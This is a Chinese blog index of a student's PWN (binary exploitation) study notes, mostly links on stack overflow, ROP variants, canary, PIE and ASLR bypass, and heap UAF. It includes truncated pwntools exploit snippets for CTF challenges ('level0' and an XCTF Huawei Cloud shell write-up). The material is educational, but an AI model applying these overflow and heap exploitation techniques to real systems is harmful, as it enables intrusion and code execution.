![](https://img-blog.csdnimg.cn/20190918140129601.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
PWN学习篇
PWN学习记录
叶叶扁舟
だいがくせい
展开
-
栈溢出return to register(ret2reg)绕过ASLR
ROP-Ret2reg详解:https://cloud.tencent.com/developer/article/1740171原创 2021-04-07 21:18:48 · 280 阅读 · 0 评论 -
linux下的系统调用
linux下的系统调用全过程:https://blog.csdn.net/cs2539263027/article/details/78977054原创 2021-04-04 15:29:11 · 143 阅读 · 0 评论 -
Mac PWN 入门系列(七)Ret2Csu
Mac PWN 入门系列(七)Ret2Csu:https://www.anquanke.com/post/id/205858原创 2021-04-03 11:33:16 · 254 阅读 · 0 评论 -
Syscalls used by malloc(英文文献)
Syscalls used by malloc:https://sploitfun.wordpress.com/2015/02/11/syscalls-used-by-malloc/原创 2021-04-03 10:59:01 · 108 阅读 · 0 评论 -
linux系统内存管理
转载自:https://blog.csdn.net/youngleoo/article/details/47860851虚拟地址空间:每个进程都有自己的虚拟内存地址空间,32位操作系统下是4GB的内存空间,这些虚拟内存通过页表映射到实际的物理内存,它们被操作系统的内核维护并被处理器使用。每个进程都有自己的页表,一旦虚拟地址被使用,它们会被所有运行在机器上的软件所使用,包括内核自身。因此虚拟地址空间必须留一些给内核专用(Linux下3G~4G的空间),这并不意味之内核使用如此多的物理内存,而只是意味着内核转载 2021-04-02 18:04:38 · 143 阅读 · 0 评论 -
DynELF的原理及应用
Pwntools之DynELF原理探究:https://www.freebuf.com/articles/system/193646.html原创 2021-03-29 20:11:39 · 568 阅读 · 0 评论 -
ret2csu
好好说话之ret2csu:https://blog.csdn.net/qq_41202237/article/details/105913597原创 2021-03-28 19:58:04 · 154 阅读 · 0 评论 -
堆溢出
堆漏洞-UAF漏洞简析https://blog.csdn.net/qq_43390703/article/details/108921661原创 2021-03-22 19:34:42 · 168 阅读 · 0 评论 -
格式化字符串printf函数机制
https://www.52pojie.cn/thread-401929-1-1.htmlprintf("%3$s", 1, “b”, “c”, 4)表示将第三个参数输出,即Cprintf(“AAA%3$n”)表示将前面字符串的个数存入第三个参数,即3原创 2021-03-19 12:30:12 · 156 阅读 · 0 评论 -
UAF漏洞
UAF漏洞产生原理应用程序调用free()释放内存时,如果内存块小于256kb,dlmalloc并不马上将内存块释放回内存,而是将内存块标记为空闲状态。这么做的原因有两个:一是内存块不一定能马上释放会内核(比如内存块不是位于堆顶端),二是供应用程序下次申请内存使用(这是主要原因)。当dlmalloc中空闲内存量达到一定值时dlmalloc才将空闲内存释放会内核。如果应用程序申请的内存大于256kb,dlmalloc调用mmap()向内核申请一块内存,返回返还给应用程序使用。如果应用程序释放的内存大于256原创 2021-03-15 13:43:48 · 958 阅读 · 0 评论 -
DynELF获取libc版本
参考题目:攻防世界pwn-200、pwn-100https://blog.csdn.net/weixin_43868725/article/details/107878667原创 2021-02-25 20:28:43 · 138 阅读 · 0 评论 -
BUUCTF one_gadget
https://www.yuque.com/chenguangzhongdeyimoxiao/xx6p74/ng8arh原创 2021-02-21 13:03:05 · 389 阅读 · 0 评论 -
大年初一绕过PIE
PIE保护详解和常用bypass手段:https://www.anquanke.com/post/id/177520原创 2021-02-12 16:22:05 · 458 阅读 · 0 评论 -
栈溢出的神奇利用思路之栈迁移
栈迁移原理图示:https://www.cnblogs.com/yichen115/p/12450517.html原创 2021-01-30 21:51:32 · 236 阅读 · 0 评论 -
ptmalloc内存分配机制
堆的ptmalloc机制:https://www.cnblogs.com/P201521440001/p/9753693.html原创 2021-01-27 12:04:36 · 142 阅读 · 0 评论 -
GDB调试指南
GDB调试指南:https://blog.csdn.net/chen1415886044/article/details/105094688/原创 2021-01-23 16:29:27 · 118 阅读 · 0 评论 -
泄露Canary的正确姿势
Canary学习(泄露Canary):https://www.icode9.com/content-4-626619.html原创 2021-01-22 22:36:24 · 295 阅读 · 0 评论 -
汇编指令rep stosq
rep指令:https://blog.csdn.net/xrzh8989/article/details/45314111stosq指令:https://blog.csdn.net/misterliwei/article/details/4353768原创 2021-01-22 22:17:34 · 984 阅读 · 1 评论 -
深入理解Glibc内存管理
深入理解Glibc内存管理http://www.doc88.com/p-54059403925977.html原创 2021-01-19 18:11:54 · 224 阅读 · 0 评论 -
深入理解堆的实现
深入理解Glibc堆的实现(上):http://app.myzaker.com/news/article.php?pk=5cba851077ac645c53601742原创 2021-01-19 18:09:51 · 122 阅读 · 0 评论 -
栈溢出之BROP
Blind Return Oriented Programming (BROP) Attack - 攻击原理:https://blog.csdn.net/omnispace/article/details/51006149BROP:https://www.jianshu.com/p/2bd323e7e97f原创 2021-01-01 14:24:02 · 221 阅读 · 0 评论 -
栈溢出之SROP
高级ROP-SROP:https://www.yuque.com/u239977/cbzkn3/ynq3zc原创 2021-01-01 13:57:35 · 166 阅读 · 0 评论 -
现代栈溢出利用技术基础之BROP和SROP
https://www.anquanke.com/post/id/85831原创 2020-12-31 21:32:04 · 252 阅读 · 0 评论 -
gcc安全编译选项
https://blog.csdn.net/pwl999/article/details/111035160原创 2020-12-24 14:34:38 · 396 阅读 · 0 评论 -
绕过Canary与Canary的泄露
Canary学习(泄露Canary):https://blog.csdn.net/acsuccess/article/details/104115114泄露canary:https://blog.csdn.net/qq_38204481/article/details/81076850原创 2020-12-24 14:02:07 · 257 阅读 · 0 评论 -
uaf漏洞利用、use after free
UAF学习–原理及利用:https://www.cnblogs.com/alert123/p/4918041.html原创 2020-12-24 13:06:28 · 296 阅读 · 0 评论 -
攻防世界level0机器码形式payload
第一次写出了机器码payload哈哈哈from pwn import *context.log_level='debug'#r=remote('220.249.52.134',53019)r=process('./level0')system_call=0x400596ret_addr=0x400431#payload='A'*0x80+'B'*0x8+p64(ret_addr)+p64(system_call)payload='\x65\x65\x65\x65\x65\x65\x65\x6原创 2020-12-23 17:35:36 · 173 阅读 · 0 评论 -
2020XCTF华为云专场pwn题WP
PwnCPP解题思路题⽬存在uaf,结合堆⻛⽔getshell#!/usr/bin/python#coding:utf-8from pwn import *context.log_level='debug'#io=process("./chall",env={"LD_PRELOAD":"./libc-2.31.so"})io=remote('124.70.12.210', 10002)libc=ELF("./libc-2.31.so")sla=lambda a : io.sendlin原创 2020-12-23 16:53:19 · 467 阅读 · 0 评论 -
堆溢出资料汇总
新手科普 | CTF PWN堆溢出总结:https://www.freebuf.com/articles/system/171261.htmli春秋:https://www.ichunqiu.com/course/57507原创 2020-12-22 18:19:24 · 155 阅读 · 0 评论 -
堆栈平衡
参考链接https://blog.csdn.net/imjaron/article/details/79686685原创 2020-12-21 22:35:06 · 540 阅读 · 0 评论 -
fuzz黑盒测试
语雀:warmup (fuzz:黑盒测试)https://www.yuque.com/chenguangzhongdeyimoxiao/xx6p74/tdx0mi原创 2020-12-21 21:53:38 · 1350 阅读 · 0 评论 -
endbr64指令
英文版:https://www.it1352.com/1949402.html原创 2020-12-19 23:18:59 · 2929 阅读 · 1 评论 -
gdb调试技巧
GDB入门教程之查看函数调用堆栈:https://www.sohu.com/a/370715183_468635原创 2020-12-19 22:50:20 · 147 阅读 · 1 评论 -
puts函数泄露地址
CTF中的PWN——绕CANARY防护3(选择项+PUTS带出CANARY+泄露函数地址计算基地址):https://www.freesion.com/article/5901691025/利用puts函数泄露libc内存信息:https://www.it610.com/article/1296102748638486528.htm原创 2020-12-17 20:58:50 · 962 阅读 · 0 评论 -
编写EXP时需要用到的相对路径和绝对路径表示法
“.” – 表示当前目录,相对路径。“…” – 代表上一层目录,相对路径。“…/…/” – 上一层目录的上一层目录,相对路径。“/” – 根目录,绝对路径。“D:/New folder/” – 物理路径,绝对路径。符号“.”来表示当前目录,用符号“…”来表示当前目录的父(上一层)目录,这是绝对路径和相对路径最基础的知识,记录一下,备忘。...原创 2020-12-17 20:39:24 · 238 阅读 · 0 评论 -
本地进程p=process()时出现EOF退出问题
这个是属于环境变量错误,一般只需要在payload中加上ret等指令就可以解决原创 2020-12-17 19:53:05 · 360 阅读 · 0 评论 -
如何找到ELF程序对应的libc版本问题
参考链接:https://qastack.cn/ubuntu/163138/how-do-i-find-what-version-of-libc-my-application-links-to原创 2020-12-17 19:51:20 · 900 阅读 · 0 评论 -
函数调用约定cdecl、stdcall、fastcall、naked call、pascal的区别
CTF wiki C语言函数调用栈(二):https://www.cnblogs.com/clover-toeic/p/3756668.html原创 2020-12-16 23:15:46 · 156 阅读 · 0 评论 -
栈溢出原理和绕过技术 | NX、CANARY、ASLR、RELRO
GitHub:https://github.com/ylcangel/binary_vulnerability/原创 2020-12-16 18:21:46 · 839 阅读 · 0 评论 -
构造虚假栈帧 | 花式栈溢出
花式栈溢出技巧----stack pivoting/frame faking:https://blog.csdn.net/qq_42192672/article/details/83039125原创 2020-12-15 13:31:38 · 173 阅读 · 0 评论